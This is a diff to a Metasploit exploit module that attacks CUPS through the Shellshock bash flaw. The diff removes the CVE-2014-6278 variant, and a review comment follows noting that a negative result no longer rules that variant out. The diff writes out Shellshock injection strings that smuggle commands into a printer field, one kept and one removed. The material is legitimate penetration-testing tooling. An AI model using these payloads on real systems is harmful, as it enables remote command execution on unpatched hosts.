diff --git a/modules/exploits/multi/http/cups_bash_env_exec.rb b/modules/exploits/multi/http/cups_bash_env_exec.rb
index 8e438ee97a..dc955504f0 100644
--- a/modules/exploits/multi/http/cups_bash_env_exec.rb
+++ b/modules/exploits/multi/http/cups_bash_env_exec.rb
@@ -19,7 +19,6 @@ class Metasploit4 < Msf::Exploit::Remote
 },
 'Author' => [
 'Stephane Chazelas', # Vulnerability discovery
- 'lcamtuf', # CVE-2014-6278
 'Brendan Coles ' # msf
 ],
 'References' => [
@@ -54,7 +53,6 @@ class Metasploit4 < Msf::Exploit::Remote
 OptBool.new('SSL', [ true, 'Use SSL', true ]),
 OptString.new('USERNAME', [ true, 'CUPS username', 'root']),
 OptString.new('PASSWORD', [ true, 'CUPS user password', '']),
- OptEnum.new('CVE', [ true, 'CVE to exploit', 'CVE-2014-6271', ['CVE-2014-6271', 'CVE-2014-6278'] ]),
 OptString.new('RPATH', [ true, 'Target PATH for binaries', '/bin' ])
 ], self.class)
 end
@@ -66,13 +64,6 @@ class Metasploit4 < Msf::Exploit::Remote
 %{() { :;}; $(#{cmd}) & }
 end
 
- #
- # CVE-2014-6278
- #
- def cve_2014_6278(cmd)
- %{() { _; } >_[$($())] { $(#{cmd}) & }}
- end
-
 #
 # Check credentials
 #
@@ -107,17 +98,9 @@ class Metasploit4 < Msf::Exploit::Remote
 @cookie = rand_text_alphanumeric(16)
 printer_name = rand_text_alphanumeric(10 + rand(5))
 
- # Select target CVE
- case datastore['CVE']
- when 'CVE-2014-6278'
- cmd = cve_2014_6278(payload.raw)
- else
- cmd = cve_2014_6271(payload.raw)
- end
-
 # Add a printer containing the payload
 # with a CUPS filter pointing to /bin/bash
- res = add_printer(printer_name, cmd)
+ res = add_printer(printer_name, cve_2014_6271(payload.raw))
 if !res
 fail_with(Failure::Unreachable, "#{peer} - Could not add printer - Connection failed.")
 elsif res.body =~ /Set Default Options for #{printer_name}/
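Review bot: With the `CVE` option gone, the call `add_printer(printer_name, cve_2014_6271(payload.raw))` covers only CVE-2014-6271, and nothing at the call site or in the visible metadata tells an operator that a clean run no longer says anything about CVE-2014-6278. A host patched for the first issue but not the second would presumably now come back as not exploitable, which is easy to misread as fully patched in an assessment report. I would add a comment above the call, `# Only CVE-2014-6271 is exercised; a negative result does not rule out CVE-2014-6278`, and check that the Description and References (both outside these hunks) no longer mention the removed variant. The enclosing method starts and ends outside the hunk.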